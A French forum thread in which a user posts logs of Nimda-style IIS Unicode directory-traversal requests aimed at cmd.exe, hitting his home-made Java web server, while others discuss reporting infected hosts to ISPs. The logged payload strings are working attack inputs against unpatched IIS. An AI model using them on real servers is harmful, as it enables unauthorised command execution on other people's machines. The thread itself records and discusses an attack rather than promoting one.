| |||||
| Dernière réponse | ||
|---|---|---|
| Sujet : On essaye de rentrer chez moi! | ||
| Jet |
[edtdd]--Message édité par Jet--[/edtdd] |
|
| Aperçu |
|---|
| Vue Rapide de la discussion |
|---|
| Jet |
[edtdd]--Message édité par Jet--[/edtdd] |
| krosso |
|
| Jet |
|
| Jet |
|
| krosso | Et ça continue encore et encore...
Des milliers de requêtes http foireuses continuent d'arriver. C'est dingue! Sortez couverts! N'installez pas IIS! |
| krosso |
|
| Jet |
|
| YupYup |
0.3%
Ayant bossé chez un ISP, je peux t'assurer du contraire, et même te dire que souvent, c'est un mec très haut placé (niveau technique) qui gère ce type de services. |
| Jet |
|
| YupYup |
Je ne vois pas en quoi le fait de prévenir l'admin est plus intelligent que le fait de prévenir l'ISP. Si les ISPs informaient correctement leurs abonnés sur les risques liés aux programmes de mails non-sécurisés, on se ferait beaucoup moins emmerder par les attaques.
|
| Jet |
|
| Jet |
|
| YupYup |
Ce n'en sera pas un si tout le monde se passe le mot et qu'on commence à bien flooder les différents ISPs mondiaux. Et, en toute honnêteté, flooder Wanadoo, moi j'aime bien :D |
| krosso |
|
| krosso |
|
| YupYup | Mail à abuse@wanadoo.nl
Si tout le monde faisait ça dès qu'une attaque arrivait, les providers nous paieraient pour installer des anti-virus. Montre l'exemple ! |
| Jet | virus nimda tout craché
Ce sont des serveurs IIS infectés qui t'attaquent à l'insu du plein gré de l'admin Jet |
| YupYup | Fichtre, sont féroces ces néerlandais :lol: |
| krosso | En ce moment, je suis en train de me bricoler un serveur httpd en java.
Je suis connecté au net en permanence, et mon serveur tourne la plupart du temps en loggant toutes les requêtes qui arrivent. Comme personne ne connait mon IP qui est dynamique, personne n'est censé se connecter chez moi à part moi même. et pourtant: Request: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connected: IPledn-wdz-15b5.adsl.wanadoo.nl/212.129.149.181 Request: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connected: IPledn-wdz-15b5.adsl.wanadoo.nl/212.129.149.181 Request: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Request: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Connected: IPledn-wdz-15b5.adsl.wanadoo.nl/212.129.149.181 Request: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connected: IPledn-wdz-15b5.adsl.wanadoo.nl/212.129.149.181 ... et ça continue sur des pages et des pages ... amusant non ? Apparemment y a un petit gars abonné chez mamadou.nl qui tente de lire mon disque!!! En tout cas je suis bien content de ne pas avoir un vieil IIS tout troué qui tourne sur ma machine!!! Et ce cirque a duré toute la soirée avec des tas d'adresses différentes de celle de cet exemple. Je ne croyais pas qu'on était si menacé! ch'Krosso |